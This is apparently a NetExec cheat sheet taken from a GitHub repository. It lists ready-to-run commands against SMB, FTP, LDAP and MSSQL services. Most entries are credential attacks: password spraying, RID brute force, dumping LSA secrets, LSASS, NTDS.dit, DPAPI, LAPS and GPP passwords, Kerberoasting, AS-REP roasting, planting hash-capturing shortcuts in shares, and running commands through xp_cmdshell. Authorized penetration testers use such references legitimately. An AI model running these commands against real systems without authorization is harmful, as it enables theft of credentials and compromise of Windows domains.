netexec

smb

initial enumeration

netexec smb target

null authentication

netexec smb target -u '' -p ''

guest authentication

netexec smb target -u 'guest' -p ''

list shares

netexec smb target -u '' -p '' --shares
netexec smb target -u username -p password --shares

list usernames

netexec smb target -u '' -p '' --users
netexec smb target -u '' -p '' --rid-brute
netexec smb target -u username -p password --users

local authentication

netexec smb target -u username -p password --local-auth

using kerberos

netexec smb target -u username -p password -k

password spray

netexec smb target -u users.txt -p password --continue-on-success
netexec smb target -u usernames.txt -p passwords.txt --no-bruteforce --continue-on-success
netexec ssh target -u username -p password --continue-on-success

all in one

netexec smb target -u username -p password --groups --local-groups --loggedon-users --rid-brute --sessions --users --shares --pass-pol

spider_plus module

netexec smb target -u username -p password -M spider_plus
netexec smb target -u username -p password -k --get-file target_file output_file --share sharename

dump a specific file

netexec smb target -u username -p password -k --get-file target_file output_file --share sharename

dump lsa secrets

netexec smb target -u username -p password --local-auth --lsa

group policy preferences

netexec smb target -u username -p password -M gpp_password

dump laps v1 and v2 password

netexec smb target -u username -p password --laps

dump dpapi credentials

netexec smb target -u username -p password --laps --dpapi

dump ntds.dit

netexec smb target -u username -p password --ntds

webdav - checks whether the webclient service is running on the target

netexec smb ip -u username -p password -M webdav 

veeam - extracts credentials from local veeam sql database

netexec smb target -u username -p password -M veeam

slinky - creates windows shortcuts with the icon attribute containing a UNC path to the specified SMB server in all shares with write permissions

netexec smb ip -u username -p password -M slinky 

ntdsutil - dump ntds with ntdsutil

netexec smb ip -u username -p password -M ntdsutil

dump lsass

netexec smb target -u username -p password -M lsassy

retrieve msol account password

netexec smb target -u username -p password -M msol

ftp

list folders and files

netexec ftp target -u username -p password --ls

list files inside a folder

netexec ftp target -u username -p password --ls folder_name

retrieve a specific file

netexec ftp target -u username -p password --ls folder_name --get file_name

ldap

enumerate users using ldap

netexec ldap target -u '' -p '' --users

all in one

netexec ldap target -u username -p password --trusted-for-delegation  --password-not-required --admin-count --users --groups

kerberoast

netexec ldap target -u username -p password --kerberoasting kerb.txt

asreproast

netexec ldap target -u username -p password --asreproast asrep.txt

gmsa

netexec ldap target -u username -p password --gmsa-convert-id id
netexec ldap domain -u username -p password --gmsa-decrypt-lsa gmsa_account

check the machine account quota

netexec ldap target -u username -p password -M maq

adcs enumeration

netexec ldap target -u username -p password -M adcs

bloodhound

netexec ldap target -u username -p password --bloodhound -ns ip --collection All

mssql

  • authentication
netexec mssql target -u username -p password

execute commands using xp_cmdshell

netexec mssql target -u username -p password -x command_to_execute

-X for powershell and -x for cmd

get a file

netexec mssql target -u username -p password --get-file output_file target_file

source: https://github.com/seriotonctf/cme-nxc-cheat-sheet